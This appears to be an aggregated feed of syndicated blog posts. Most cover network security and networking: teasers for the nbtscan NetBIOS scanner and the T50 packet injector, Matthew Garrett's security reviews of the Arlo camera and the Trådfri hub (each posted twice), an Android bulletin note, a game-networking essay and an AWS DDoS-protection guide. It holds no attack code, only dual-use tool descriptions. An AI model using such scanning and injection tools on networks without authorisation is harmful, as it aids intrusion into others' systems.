nbtscan is a command-line NetBIOS scanner for Windows that is SUPER fast, it scans for open NetBIOS nameservers on a local or remote TCP/IP network, and this is the first step in the finding of open shares.

It is based on the functionality of the standard Windows tool nbtstat, but it operates on a range of addresses instead of just one.

What is nbtscan?

NETBIOS is commonly known as the Windows “Network Neighborhood” protocol, and (among other things), it provides a name service that listens on UDP port 137.

Read the rest of nbtscan Download – NetBIOS Scanner For Windows & Linux now! Only available at Darknet.

pgmproxy

Post Syndicated from Vasil Kolev original https://vasil.ludost.net/blog/?p=3364

На FOSDEM 2016 видео потоците в локалната мрежа бяха носени през UDP, което при загуби по мрежата водеше до разни неприятни прекъсвания и обърквания на ffmpeg-а.

След разговори по темата за мрежа без загуби, пакети, пренасяни от еднорози и изграждане на infiniband мрежа в ULB, бях стигнал до идеята да търся или нещо с forward error correction, или някакъв reliable multicast. За FEC се оказа, че има някаква реализация от едно време за ffmpeg за PRO-MPEG, която не е била приета по някакви причини, за reliable multicast открих два протокола – PGM и NORM.

За PGM се оказа, че има хубава реализация, която 1) я има в Debian, 2) има прилични примери и 3) може да има средно ужасна документация, но source е сравнително четим и става за дебъгване. Измъкнах си старото ttee, разчистих кода от разни ненужни неща и си направих едно тривиално proxy, което да разнася пакети между UDP и PGM (и stdin/stdout за дебъгване). Може да се намери на https://github.com/krokodilerian/pgmproxy, като в момента е в proof-of-concept състояние и единственото, което мога да кажа е, че успявам да прекарам през него един FLAC през мрежата и да го слушам 🙂 Следват тестове в мрежа със загуби (щото в моя локален wifi са доста малко) и доизчистване, че да го ползваме на FOSDEM.

T50 – The Fastest Mixed Packet Injector Tool

Post Syndicated from Darknet original http://feedproxy.google.com/~r/darknethackers/~3/B2WjV8EI9MA/

T50 (f.k.a. F22 Raptor) is a high performance mixed packet injector tool designed to perform Stress Testing. The concept started on 2001, right after release ‘nb-isakmp.c‘, and the main goal was to have a tool to perform TCP/IP protocol fuzzing, covering common regular protocols, such as: ICMP, TCP and UDP. Why Stress Testing? Why Stress…

Read the full post at darknet.org.uk

A few tidbits on networking in games

Post Syndicated from Eevee original https://eev.ee/blog/2017/05/22/a-few-tidbits-on-networking-in-games/

Nova Dasterin asks, via Patreon:

How about do something on networking code, for some kind of realtime game (platformer or MMORPG or something). 😀

Ah, I see. You’re hoping for my usual detailed exploration of everything I know about networking code in games.

Well, joke’s on you! I don’t know anything about networking.

Wait… wait… maybe I know one thing.

Doom

Surprise! The thing I know is, roughly, how multiplayer Doom works.

Doom is 100% deterministic. Its random number generator is really a list of shuffled values; each request for a random number produces the next value in the list. There is no seed, either; a game always begins at the first value in the list. Thus, if you play the game twice with exactly identical input, you’ll see exactly the same playthrough: same damage, same monster behavior, and so on.

And that’s exactly what a Doom demo is: a file containing a recording of player input. To play back a demo, Doom runs the game as normal, except that it reads input from a file rather than the keyboard.

Multiplayer works the same way. Rather than passing around the entirety of the world state, Doom sends the player’s input to all the other players. Once a node has received input from every connected player, it advances the world by one tic. There’s no client or server; every peer talks to every other peer.

You can read the code if you want to, but at a glance, I don’t think there’s anything too surprising here. Only sending input means there’s not that much to send, and the receiving end just has to queue up packets from every peer and then play them back once it’s heard from everyone. The underlying transport was pluggable (this being the days before we’d even standardized on IP), which complicated things a bit, but the Unix port that’s on GitHub just uses UDP. The Doom Wiki has some further detail.

This approach is very clever and has a few significant advantages. Bandwidth requirements are fairly low, which is important if it happens to be 1993. Bandwidth and processing requirements are also completely unaffected by the size of the map, since map state never touches the network.

Unfortunately, it has some drawbacks as well. The biggest is that, well, sometimes you want to get the world state back in sync. What if a player drops and wants to reconnect? Everyone has to quit and reconnect to one another. What if an extra player wants to join in? It’s possible to load a saved game in multiplayer, but because the saved game won’t have an actor for the new player, you can’t really load it; you’d have to start fresh from the beginning of a map.

It’s fairly fundamental that Doom allows you to save your game at any moment… but there’s no way to load in the middle of a network game. Everyone has to quit and restart the game, loading the right save file from the command line. And if some players load the wrong save file… I’m not actually sure what happens! I’ve seen ZDoom detect the inconsistency and refuse to start the game, but I suspect that in vanilla Doom, players would have mismatched world states and their movements would look like nonsense when played back in each others’ worlds.

Ah, yes. Having the entire game state be generated independently by each peer leads to another big problem.

Cheating

Maybe this wasn’t as big a deal with Doom, where you’d probably be playing with friends or acquaintances (or coworkers). Modern games have matchmaking that pits you against strangers, and the trouble with strangers is that a nontrivial number of them are assholes.

Doom is a very moddable game, and it doesn’t check that everyone is using exactly the same game data. As long as you don’t change anything that would alter the shape of the world or change the number of RNG rolls (since those would completely desynchronize you from other players), you can modify your own game however you like, and no one will be the wiser. For example, you might change the light level in a dark map, so you can see more easily than the other players. Lighting doesn’t affect the game, only how its drawn, and it doesn’t go over the network, so no one would be the wiser.

Or you could alter the executable itself! It knows everything about the game state, including the health and loadout of the other players; altering it to show you this information would give you an advantage. Also, all that’s sent is input; no one said the input had to come from a human. The game knows where all the other players are, so you could modify it to generate the right input to automatically aim at them. Congratulations; you’ve invented the aimbot.

I don’t know how you can reliably fix these issues. There seems to be an entire underground ecosystem built around playing cat and mouse with game developers. Perhaps the most infamous example is World of Warcraft, where people farm in-game gold as automatically as possible to sell to other players for real-world cash.

Egregious cheating in multiplayer really gets on my nerves; I couldn’t bear knowing that it was rampant in a game I’d made. So I will probably not be working on anything with random matchmaking anytime soon.

Starbound

Let’s jump to something a little more concrete and modern.

Starbound is a procedurally generated universe exploration game — like Terraria in space. Or, if you prefer, like Minecraft in space and also flat. Notably, it supports multiplayer, using the more familiar client/server approach. The server uses the same data files as single-player, but it runs as a separate process; if you want to run a server on your own machine, you run the server and then connect to localhost with the client.

I’ve run a server before, but that doesn’t tell me anything about how it works. Starbound is an interesting example because of the existence of StarryPy — a proxy server that can add some interesting extra behavior by intercepting packets going to and from the real server.

That means StarryPy necessarily knows what the protocol looks like, and perhaps we can glean some insights by poking around in it. Right off the bat there’s a list of all the packet types and rough shapes of their data.

I modded StarryPy to print out every single decoded packet it received (from either the client or the server), then connected and immediately disconnected. (Note that these aren’t necessarily TCP packets; they’re just single messages in the Starbound protocol.) Here is my quick interpretation of what happens:

  1. The client and server briefly negotiate a connection. The password, if any, is sent with a challenge and response.

  2. The client sends a full description of its “ship world” — the player’s ship, which they take with them to other servers. The server sends a partial description of the planet the player is either on, or orbiting.

  3. From here, the server and client mostly communicate world state in the form of small delta updates. StarryPy doesn’t delve into the exact format here, unfortunately. The world basically freezes around you during a multiplayer lag spike, though, so it’s safe to assume that the vast bulk of game simulation happens server-side, and the effects are broadcast to clients.

The protocol has specific message types for various player actions: damaging tiles, dropping items, connecting wires, collecting liquids, moving your ship, and so on. So the basic model is that the player can attempt to do stuff with the chunk of the world they’re looking at, and they’ll get a reaction whenever the server gets back to them.

(I’m dimly aware that some subset of object interactions can happen client-side, but I don’t know exactly which ones. The implications for custom scripted objects are… interesting. Actually, those are slightly hellish in general; Starbound is very moddable, but last I checked it has no way to send mods from the server to the client or anything similar, and by default the server doesn’t even enforce that everyone’s using the same set of mods… so it’s possible that you’ll have an object on your ship that’s only provided by a mod you have but the server lacks, and then who knows what happens.)

IRC

Hang on, this isn’t a video game at all.

Starbound’s “fire and forget” approach reminds me a lot of IRC — a protocol I’ve even implemented, a little bit, kinda. IRC doesn’t have any way to match the messages you send to the responses you get back, and success is silent for some kinds of messages, so it’s impossible (in the general case) to know what caused an error. The most obvious fix for this would be to attach a message id to messages sent out by the client, and include the same id on responses from the server.

It doesn’t look like Starbound has message ids or any other solution to this problem — though StarryPy doesn’t document the protocol well enough for me to be sure. The server just sends a stream of stuff it thinks is important, and when it gets a request from the client, it queues up a response to that as well. It’s TCP, so the client should get all the right messages, eventually. Some of them might be slightly out of order depending on the order the client does stuff, but that’s not a big deal; anyway, the server knows the canonical state.

Some thoughts

I bring up IRC because I’m kind of at the limit of things that I know. But one of those things is that IRC is simultaneously very rickety and wildly successful: it’s a decade older than Google and still in use. (Some recent offerings are starting to eat its lunch, but those are really because clients are inaccessible to new users and the protocol hasn’t evolved much. The problems with the fundamental design of the protocol are only obvious to server and client authors.)

Doom’s cheery assumption that the game will play out the same way for every player feels similarly rickety. Obviously it works — well enough that you can go play multiplayer Doom with exactly the same approach right now, 24 years later — but for something as complex as an FPS it really doesn’t feel like it should.

So while I don’t have enough experience writing multiplayer games to give you a run-down of how to do it, I think the lesson here is that you can get pretty far with simple ideas. Maybe your game isn’t deterministic like Doom — although there’s no reason it couldn’t be — but you probably still have to save the game, or at least restore the state of the world on death/loss/restart, right? There you go: you already have a fragment of a concept of entity state outside the actual entities. Codify that, stick it on the network, and see what happens.

I don’t know if I’ll be doing any significant multiplayer development myself; I don’t even play many multiplayer games. But I’d always assumed it would be a nigh-impossible feat of architectural engineering, and I’m starting to think that maybe it’s no more difficult than anything else in game dev. Easy to fudge, hard to do well, impossible to truly get right so give up that train of thought right now.

Also now I am definitely thinking about how a multiplayer puzzle-platformer would work.

Looking at the Netgear Arlo home IP camera

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/48215.html

Another in the series of looking at the security of IoT type objects. This time I’ve gone for the Arlo network connected cameras produced by Netgear, specifically the stock Arlo base system with a single camera. The base station is based on a Broadcom 5358 SoC with an 802.11n radio, along with a single Broadcom gigabit ethernet interface. Other than it only having a single ethernet port, this looks pretty much like a standard Netgear router. There’s a convenient unpopulated header on the board that turns out to be a serial console, so getting a shell is only a few minutes work.

Normal setup is straight forward. You plug the base station into a router, wait for all the lights to come on and then you visit arlo.netgear.com and follow the setup instructions – by this point the base station has connected to Netgear’s cloud service and you’re just associating it to your account. Security here is straightforward: you need to be coming from the same IP address as the Arlo. For most home users with NAT this works fine. I sat frustrated as it repeatedly failed to find any devices, before finally moving everything behind a backup router (my main network isn’t NATted) for initial setup. Once you and the Arlo are on the same IP address, the site shows you the base station’s serial number for confirmation and then you attach it to your account. Next step is adding cameras. Each base station is broadcasting an 802.11 network on the 2.4GHz spectrum. You connect a camera by pressing the sync button on the base station and then the sync button on the camera. The camera associates with the base station via WPS and now you’re up and running.

This is the point where I get bored and stop following instructions, but if you’re using a desktop browser (rather than using the mobile app) you appear to need Flash in order to actually see any of the camera footage. Bleah.

But back to the device itself. The first thing I traced was the initial device association. What I found was that once the device is associated with an account, it can’t be attached to another account. This is good – I can’t simply request that devices be rebound to my account from someone else’s. Further, while the serial number is displayed to the user to disambiguate between devices, it doesn’t seem to be what’s used internally. Tracing the logon traffic from the base station shows it sending a long random device ID along with an authentication token. If you perform a factory reset, these values are regenerated. The device to account mapping seems to be based on this random device ID, which means that once the device is reset and bound to another account there’s no way for the initial account owner to regain access (other than resetting it again and binding it back to their account). This is far better than many devices I’ve looked at.

Performing a factory reset also changes the WPA PSK for the camera network. Newsky Security discovered that doing so originally reset it to 12345678, which is, uh, suboptimal? That’s been fixed in newer firmware, along with their discovery that the original random password choice was not terribly random.

All communication from the base station to the cloud seems to be over SSL, and everything validates certificates properly. This also seems to be true for client communication with the cloud service – camera footage is streamed back over port 443 as well.

Most of the functionality of the base station is provided by two daemons, xagent and vzdaemon. xagent appears to be responsible for registering the device with the cloud service, while vzdaemon handles the camera side of things (including motion detection). All of this is running as root, so in the event of any kind of vulnerability the entire platform is owned. For such a single purpose device this isn’t really a big deal (the only sensitive data it has is the camera feed – if someone has access to that then root doesn’t really buy them anything else). They’re statically linked and stripped so I couldn’t be bothered spending any significant amount of time digging into them. In any case, they don’t expose any remotely accessible ports and only connect to services with verified SSL certificates. They’re probably not a big risk.

Other than the dependence on Flash, there’s nothing immediately concerning here. What is a little worrying is a family of daemons running on the device and listening to various high numbered UDP ports. These appear to be provided by Broadcom and a standard part of all their router platforms – they’re intended for handling various bits of wireless authentication. It’s not clear why they’re listening on 0.0.0.0 rather than 127.0.0.1, and it’s not obvious whether they’re vulnerable (they mostly appear to receive packets from the driver itself, process them and then stick packets back into the kernel so who knows what’s actually going on), but since you can’t set one of these devices up in the first place without it being behind a NAT gateway it’s unlikely to be of real concern to most users. On the other hand, the same daemons seem to be present on several Broadcom-based router platforms where they may end up being visible to the outside world. That’s probably investigation for another day, though.

Overall: pretty solid, frustrating to set up if your network doesn’t match their expectations, wouldn’t have grave concerns over having it on an appropriately firewalled network.

(Edited to replace a mistaken reference to WDS with WPS)

comment count unavailable comments

Looking at the Netgear Arlo home IP camera

Post Syndicated from Matthew Garrett original http://mjg59.dreamwidth.org/48215.html

Another in the series of looking at the security of IoT type objects. This time I’ve gone for the Arlo network connected cameras produced by Netgear, specifically the stock Arlo base system with a single camera. The base station is based on a Broadcom 5358 SoC with an 802.11n radio, along with a single Broadcom gigabit ethernet interface. Other than it only having a single ethernet port, this looks pretty much like a standard Netgear router. There’s a convenient unpopulated header on the board that turns out to be a serial console, so getting a shell is only a few minutes work.

Normal setup is straight forward. You plug the base station into a router, wait for all the lights to come on and then you visit arlo.netgear.com and follow the setup instructions – by this point the base station has connected to Netgear’s cloud service and you’re just associating it to your account. Security here is straightforward: you need to be coming from the same IP address as the Arlo. For most home users with NAT this works fine. I sat frustrated as it repeatedly failed to find any devices, before finally moving everything behind a backup router (my main network isn’t NATted) for initial setup. Once you and the Arlo are on the same IP address, the site shows you the base station’s serial number for confirmation and then you attach it to your account. Next step is adding cameras. Each base station is broadcasting an 802.11 network on the 2.4GHz spectrum. You connect a camera by pressing the sync button on the base station and then the sync button on the camera. The camera associates with the base station via WDS and now you’re up and running.

This is the point where I get bored and stop following instructions, but if you’re using a desktop browser (rather than using the mobile app) you appear to need Flash in order to actually see any of the camera footage. Bleah.

But back to the device itself. The first thing I traced was the initial device association. What I found was that once the device is associated with an account, it can’t be attached to another account. This is good – I can’t simply request that devices be rebound to my account from someone else’s. Further, while the serial number is displayed to the user to disambiguate between devices, it doesn’t seem to be what’s used internally. Tracing the logon traffic from the base station shows it sending a long random device ID along with an authentication token. If you perform a factory reset, these values are regenerated. The device to account mapping seems to be based on this random device ID, which means that once the device is reset and bound to another account there’s no way for the initial account owner to regain access (other than resetting it again and binding it back to their account). This is far better than many devices I’ve looked at.

Performing a factory reset also changes the WPA PSK for the camera network. Newsky Security discovered that doing so originally reset it to 12345678, which is, uh, suboptimal? That’s been fixed in newer firmware, along with their discovery that the original random password choice was not terribly random.

All communication from the base station to the cloud seems to be over SSL, and everything validates certificates properly. This also seems to be true for client communication with the cloud service – camera footage is streamed back over port 443 as well.

Most of the functionality of the base station is provided by two daemons, xagent and vzdaemon. xagent appears to be responsible for registering the device with the cloud service, while vzdaemon handles the camera side of things (including motion detection). All of this is running as root, so in the event of any kind of vulnerability the entire platform is owned. For such a single purpose device this isn’t really a big deal (the only sensitive data it has is the camera feed – if someone has access to that then root doesn’t really buy them anything else). They’re statically linked and stripped so I couldn’t be bothered spending any significant amount of time digging into them. In any case, they don’t expose any remotely accessible ports and only connect to services with verified SSL certificates. They’re probably not a big risk.

Other than the dependence on Flash, there’s nothing immediately concerning here. What is a little worrying is a family of daemons running on the device and listening to various high numbered UDP ports. These appear to be provided by Broadcom and a standard part of all their router platforms – they’re intended for handling various bits of wireless authentication. It’s not clear why they’re listening on 0.0.0.0 rather than 127.0.0.1, and it’s not obvious whether they’re vulnerable (they mostly appear to receive packets from the driver itself, process them and then stick packets back into the kernel so who knows what’s actually going on), but since you can’t set one of these devices up in the first place without it being behind a NAT gateway it’s unlikely to be of real concern to most users. On the other hand, the same daemons seem to be present on several Broadcom-based router platforms where they may end up being visible to the outside world. That’s probably investigation for another day, though.

Overall: pretty solid, frustrating to set up if your network doesn’t match their expectations, wouldn’t have grave concerns over having it on an appropriately firewalled network.

comment count unavailable comments

A quick look at the Ikea Trådfri lighting platform

Post Syndicated from Matthew Garrett original http://mjg59.dreamwidth.org/47803.html

Ikea recently launched their Trådfri smart lighting platform in the US. The idea of Ikea plus internet security together at last seems like a pretty terrible one, but having taken a look it’s surprisingly competent. Hardware-wise, the device is pretty minimal – it seems to be based on the Cypress[1] WICED IoT platform, with 100MBit ethernet and a Silicon Labs Zigbee chipset. It’s running the Express Logic ThreadX RTOS, has no running services on any TCP ports and appears to listen on two single UDP ports. As IoT devices go, it’s pleasingly minimal.

That single port seems to be a COAP server running with DTLS and a pre-shared key that’s printed on the bottom of the device. When you start the app for the first time it prompts you to scan a QR code that’s just a machine-readable version of that key. The Android app has code for using the insecure COAP port rather than the encrypted one, but the device doesn’t respond to queries there so it’s presumably disabled in release builds. It’s also local only, with no cloud support. You can program timers, but they run on the device. The only other service it seems to run is an mdns responder, which responds to the _coap._udp.local query to allow for discovery.

From a security perspective, this is pretty close to ideal. Having no remote APIs means that security is limited to what’s exposed locally. The local traffic is all encrypted. You can only authenticate with the device if you have physical access to read the (decently long) key off the bottom. I haven’t checked whether the DTLS server is actually well-implemented, but it doesn’t seem to respond unless you authenticate first which probably covers off a lot of potential risks. The SoC has wireless support, but it seems to be disabled – there’s no antenna on board and no mechanism for configuring it.

However, there’s one minor issue. On boot the device grabs the current time from pool.ntp.org (fine) but also hits http://fw.ota.homesmart.ikea.net/feed/version_info.json . That file contains a bunch of links to firmware updates, all of which are also downloaded over http (and not https). The firmware images themselves appear to be signed, but downloading untrusted objects and then parsing them isn’t ideal. Realistically, this is only a problem if someone already has enough control over your network to mess with your DNS, and being wired-only makes this pretty unlikely. I’d be surprised if it’s ever used as a real avenue of attack.

Overall: as far as design goes, this is one of the most secure IoT-style devices I’ve looked at. I haven’t examined the COAP stack in detail to figure out whether it has any exploitable bugs, but the attack surface is pretty much as minimal as it could be while still retaining any functionality at all. I’m impressed.

[1] Formerly Broadcom

comment count unavailable comments

A quick look at the Ikea Trådfri lighting platform

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/47803.html

Ikea recently launched their Trådfri smart lighting platform in the US. The idea of Ikea plus internet security together at last seems like a pretty terrible one, but having taken a look it’s surprisingly competent. Hardware-wise, the device is pretty minimal – it seems to be based on the Cypress[1] WICED IoT platform, with 100MBit ethernet and a Silicon Labs Zigbee chipset. It’s running the Express Logic ThreadX RTOS, has no running services on any TCP ports and appears to listen on two single UDP ports. As IoT devices go, it’s pleasingly minimal.

That single port seems to be a COAP server running with DTLS and a pre-shared key that’s printed on the bottom of the device. When you start the app for the first time it prompts you to scan a QR code that’s just a machine-readable version of that key. The Android app has code for using the insecure COAP port rather than the encrypted one, but the device doesn’t respond to queries there so it’s presumably disabled in release builds. It’s also local only, with no cloud support. You can program timers, but they run on the device. The only other service it seems to run is an mdns responder, which responds to the _coap._udp.local query to allow for discovery.

From a security perspective, this is pretty close to ideal. Having no remote APIs means that security is limited to what’s exposed locally. The local traffic is all encrypted. You can only authenticate with the device if you have physical access to read the (decently long) key off the bottom. I haven’t checked whether the DTLS server is actually well-implemented, but it doesn’t seem to respond unless you authenticate first which probably covers off a lot of potential risks. The SoC has wireless support, but it seems to be disabled – there’s no antenna on board and no mechanism for configuring it.

However, there’s one minor issue. On boot the device grabs the current time from pool.ntp.org (fine) but also hits http://fw.ota.homesmart.ikea.net/feed/version_info.json . That file contains a bunch of links to firmware updates, all of which are also downloaded over http (and not https). The firmware images themselves appear to be signed, but downloading untrusted objects and then parsing them isn’t ideal. Realistically, this is only a problem if someone already has enough control over your network to mess with your DNS, and being wired-only makes this pretty unlikely. I’d be surprised if it’s ever used as a real avenue of attack.

Overall: as far as design goes, this is one of the most secure IoT-style devices I’ve looked at. I haven’t examined the COAP stack in detail to figure out whether it has any exploitable bugs, but the attack surface is pretty much as minimal as it could be while still retaining any functionality at all. I’m impressed.

[1] Formerly Broadcom

comment count unavailable comments

Android Security Bulletin—April 2017

Post Syndicated from corbet original https://lwn.net/Articles/718856/rss

The April
Android Security Bulletin
provides a discouragingly long list of
vulnerabilities fixed in the latest update (for those with devices
sufficiently well supported to receive them). “The most severe of
these issues is a Critical security vulnerability that could enable remote
code execution on an affected device through multiple methods such as
email, web browsing, and MMS when processing media files.
” There’s
also a fix for CVE-2016-10229, which is a remotely exploitable
vulnerability in the UDP stack that was fixed
in the 4.5 and 4.4.21 kernels. Those kernels were not vulnerable as the
result of other work, but older kernels with backported fixes (Android
kernels, for example) were.

How to Help Protect Dynamic Web Applications Against DDoS Attacks by Using Amazon CloudFront and Amazon Route 53

Post Syndicated from Holly Willey original https://aws.amazon.com/blogs/security/how-to-protect-dynamic-web-applications-against-ddos-attacks-by-using-amazon-cloudfront-and-amazon-route-53/

Using a content delivery network (CDN) such as Amazon CloudFront to cache and serve static text and images or downloadable objects such as media files and documents is a common strategy to improve webpage load times, reduce network bandwidth costs, lessen the load on web servers, and mitigate distributed denial of service (DDoS) attacks. AWS WAF is a web application firewall that can be deployed on CloudFront to help protect your application against DDoS attacks by giving you control over which traffic to allow or block by defining security rules. When users access your application, the Domain Name System (DNS) translates human-readable domain names (for example, www.example.com) to machine-readable IP addresses (for example, 192.0.2.44). A DNS service, such as Amazon Route 53, can effectively connect users’ requests to a CloudFront distribution that proxies requests for dynamic content to the infrastructure hosting your application’s endpoints.

In this blog post, I show you how to deploy CloudFront with AWS WAF and Route 53 to help protect dynamic web applications (with dynamic content such as a response to user input) against DDoS attacks. The steps shown in this post are key to implementing the overall approach described in AWS Best Practices for DDoS Resiliency and enable the built-in, managed DDoS protection service, AWS Shield.

Background

AWS hosts CloudFront and Route 53 services on a distributed network of proxy servers in data centers throughout the world called edge locations. Using the global Amazon network of edge locations for application delivery and DNS service plays an important part in building a comprehensive defense against DDoS attacks for your dynamic web applications. These web applications can benefit from the increased security and availability provided by CloudFront and Route 53 as well as improving end users’ experience by reducing latency.

The following screenshot of an Amazon.com webpage shows how static and dynamic content can compose a dynamic web application that is delivered via HTTPS protocol for the encryption of user page requests as well as the pages that are returned by a web server.

Screenshot of an Amazon.com webpage with static and dynamic content

The following map shows the global Amazon network of edge locations available to serve static content and proxy requests for dynamic content back to the origin as of the writing of this blog post. For the latest list of edge locations, see AWS Global Infrastructure.

Map showing Amazon edge locations

How AWS Shield, CloudFront, and Route 53 work to help protect against DDoS attacks

To help keep your dynamic web applications available when they are under DDoS attack, the steps in this post enable AWS Shield Standard by configuring your applications behind CloudFront and Route 53. AWS Shield Standard protects your resources from common, frequently occurring network and transport layer DDoS attacks. Attack traffic can be geographically isolated and absorbed using the capacity in edge locations close to the source. Additionally, you can configure geographical restrictions to help block attacks originating from specific countries.

The request-routing technology in CloudFront connects each client to the nearest edge location, as determined by continuously updated latency measurements. HTTP and HTTPS requests sent to CloudFront can be monitored, and access to your application resources can be controlled at edge locations using AWS WAF. Based on conditions that you specify in AWS WAF, such as the IP addresses that requests originate from or the values of query strings, traffic can be allowed, blocked, or allowed and counted for further investigation or remediation. The following diagram shows how static and dynamic web application content can originate from endpoint resources within AWS or your corporate data center. For more details, see How CloudFront Delivers Content and How CloudFront Works with Regional Edge Caches.

Route 53 DNS requests and subsequent application traffic routed through CloudFront are inspected inline. Always-on monitoring, anomaly detection, and mitigation against common infrastructure DDoS attacks such as SYN/ACK floods, UDP floods, and reflection attacks are built into both Route 53 and CloudFront. For a review of common DDoS attack vectors, see How to Help Prepare for DDoS Attacks by Reducing Your Attack Surface. When the SYN flood attack threshold is exceeded, SYN cookies are activated to avoid dropping connections from legitimate clients. Deterministic packet filtering drops malformed TCP packets and invalid DNS requests, only allowing traffic to pass that is valid for the service. Heuristics-based anomaly detection evaluates attributes such as type, source, and composition of traffic. Traffic is scored across many dimensions, and only the most suspicious traffic is dropped. This method allows you to avoid false positives while protecting application availability.

Route 53 is also designed to withstand DNS query floods, which are real DNS requests that can continue for hours and attempt to exhaust DNS server resources. Route 53 uses shuffle sharding and anycast striping to spread DNS traffic across edge locations and help protect the availability of the service.

The next four sections provide guidance about how to deploy CloudFront, Route 53, AWS WAF, and, optionally, AWS Shield Advanced.

Deploy CloudFront

To take advantage of application delivery with DDoS mitigations at the edge, start by creating a CloudFront distribution and configuring origins:

  1. Sign in to the AWS Management Console and open the CloudFront console
  2. Choose Create Distribution.
  3. On the first page of the Create Distribution Wizard, in the Web section, choose Get Started.
  4. Specify origin settings for the distribution. The following screenshot of the CloudFront console shows an example CloudFront distribution configured with an Elastic Load Balancing load balancer origin, as shown in the previous diagram. I have configured this example to set the Origin SSL Protocols to use TLSv1.2 and the Origin Protocol Policy to HTTP Only. For more information about creating an HTTPS listener for your ELB load balancer and requesting a certificate from AWS Certificate Manager (ACM), see Getting Started with Elastic Load BalancingSupported Regions, and Requiring HTTPS for Communication Between CloudFront and Your Custom Origin.
  1. Specify cache behavior settings for the distribution, as shown in the following screenshot. You can configure each URL path pattern with a set of associated cache behaviors. For dynamic web applications, set the Minimum TTL to 0 so that CloudFront will make a GET request with an If-Modified-Since header back to the origin. When CloudFront proxies traffic to the origin from edge locations and back, multiple concurrent requests for the same object are collapsed into a single request. The request is sent over a persistent connection from the edge location to the region over networks monitored by AWS. The use of a large initial TCP window size in CloudFront maximizes the available bandwidth, and TCP Fast Open (TFO) reduces latency.
  2. To ensure that all traffic to CloudFront is encrypted and to enable SSL termination from clients at global edge locations, specify Redirect HTTP to HTTPS for Viewer Protocol Policy. Moving SSL termination to CloudFront offloads computationally expensive SSL negotiation, helps mitigate SSL abuse, and reduces latency with the use of OCSP stapling and session tickets. For more information about options for serving HTTPS requests, see Choosing How CloudFront Serves HTTPS Requests. For dynamic web applications, set Allowed HTTP Methods to include all methods, set Forward Headers to All, and for Query String Forwarding and Caching, choose Forward all, cache based on all.
  1. Specify distribution settings for the distribution, as shown in the following screenshot. Enter your domain names in the Alternate Domain Names box and choose Custom SSL Certificate.
  2. Choose Create Distribution. Note the x.cloudfront.net Domain Name of the distribution. In the next section, you will configure Route 53 to route traffic to this CloudFront distribution domain name.

Configure Route 53

When you created a web distribution in the previous section, CloudFront assigned a domain name to the distribution, such as d111111abcdef8.cloudfront.net. You can use this domain name in the URLs for your content, such as: http://d111111abcdef8.cloudfront.net/logo.jpg.

Alternatively, you might prefer to use your own domain name in URLs, such as: http://example.com/logo.jpg. You can accomplish this by creating a Route 53 alias resource record set that routes dynamic web application traffic to your CloudFront distribution by using your domain name. Alias resource record sets are virtual records specific to Route 53 that are used to map alias resource record sets for your domain to your CloudFront distribution. Alias resource record sets are similar to CNAME records except there is no charge for DNS queries to Route 53 alias resource record sets mapped to AWS services. Alias resource record sets are also not visible to resolvers, and they can be created for the root domain (zone apex) as well as subdomains.

A hosted zone, similar to a DNS zone file, is a collection of records that belongs to a single parent domain name. Each hosted zone has four nonoverlapping name servers in a delegation set. If a DNS query is dropped, the client automatically retries the next name server. If you have not already registered a domain name and have not configured a hosted zone for your domain, complete these two prerequisite steps before proceeding:

After you have registered your domain name and configured your public hosted zone, follow these steps to create an alias resource record set:

  1. Sign in to the AWS Management Console and open the Route 53 console.
  2. In the navigation pane, choose Hosted Zones.
  3. Choose the name of the hosted zone for the domain that you want to use to route traffic to your CloudFront distribution.
  4. Choose Create Record Set.
  5. Specify the following values:
    • Name – Type the domain name that you want to use to route traffic to your CloudFront distribution. The default value is the name of the hosted zone. For example, if the name of the hosted zone is example.com and you want to use acme.example.com to route traffic to your distribution, type acme.
    • Type – Choose A – IPv4 address. If IPv6 is enabled for the distribution and you are creating a second resource record set, choose AAAA – IPv6 address.
    • Alias – Choose Yes.
    • Alias Target – In the CloudFront distributions section, choose the name that CloudFront assigned to the distribution when you created it.
    • Routing Policy – Accept the default value of Simple.
    • Evaluate Target Health – Accept the default value of No.
  6. Choose Create.
  7. If IPv6 is enabled for the distribution, repeat Steps 4 through 6. Specify the same settings except for the Type field, as explained in Step 5.

The following screenshot of the Route 53 console shows a Route 53 alias resource record set that is configured to map a domain name to a CloudFront distribution.

If your dynamic web application requires geo redundancy, you can use latency-based routing in Route 53 to run origin servers in different AWS regions. Route 53 is integrated with CloudFront to collect latency measurements from each edge location. With Route 53 latency-based routing, each CloudFront edge location goes to the region with the lowest latency for the origin fetch.

Enable AWS WAF

AWS WAF is a web application firewall that helps detect and mitigate web application layer DDoS attacks by inspecting traffic inline. Application layer DDoS attacks use well-formed but malicious requests to evade mitigation and consume application resources. You can define custom security rules (also called web ACLs) that contain a set of conditions, rules, and actions to block attacking traffic. After you define web ACLs, you can apply them to CloudFront distributions, and web ACLs are evaluated in the priority order you specified when you configured them. Real-time metrics and sampled web requests are provided for each web ACL.

You can configure AWS WAF whitelisting or blacklisting in conjunction with CloudFront geo restriction to prevent users in specific geographic locations from accessing your application. The AWS WAF API supports security automation such as blacklisting IP addresses that exceed request limits, which can be useful for mitigating HTTP flood attacks. Use the AWS WAF Security Automations Implementation Guide to implement rate-based blacklisting.

The following diagram shows how the (a) flow of CloudFront access logs files to an Amazon S3 bucket (b) provides the source data for the Lambda log parser function (c) to identify HTTP flood traffic and update AWS WAF web ACLs. As CloudFront receives requests on behalf of your dynamic web application, it sends access logs to an S3 bucket, triggering the Lambda log parser. The Lambda function parses CloudFront access logs to identify suspicious behavior, such as an unusual number of requests or errors, and it automatically updates your AWS WAF rules to block subsequent requests from the IP addresses in question for a predefined amount of time that you specify.

Diagram of the process

In addition to automated rate-based blacklisting to help protect against HTTP flood attacks, prebuilt AWS CloudFormation templates are available to simplify the configuration of AWS WAF for a proactive application-layer security defense. The following diagram provides an overview of CloudFormation template input into the creation of the CommonAttackProtection stack that includes AWS WAF web ACLs used to block, allow, or count requests that meet the criteria defined in each rule.

Diagram of CloudFormation template input into the creation of the CommonAttackProtection stack

To implement these application layer protections, follow the steps in Tutorial: Quickly Setting Up AWS WAF Protection Against Common Attacks. After you have created your AWS WAF web ACLs, you can assign them to your CloudFront distribution by updating the settings.

  1. Sign in to the AWS Management Console and open the CloudFront console.
  2. Choose the link under the ID column for your CloudFront distribution.
  3. Choose Edit under the General
  4. Choose your AWS WAF Web ACL from the drop-down
  5. Choose Yes, Edit.

Activate AWS Shield Advanced (optional)

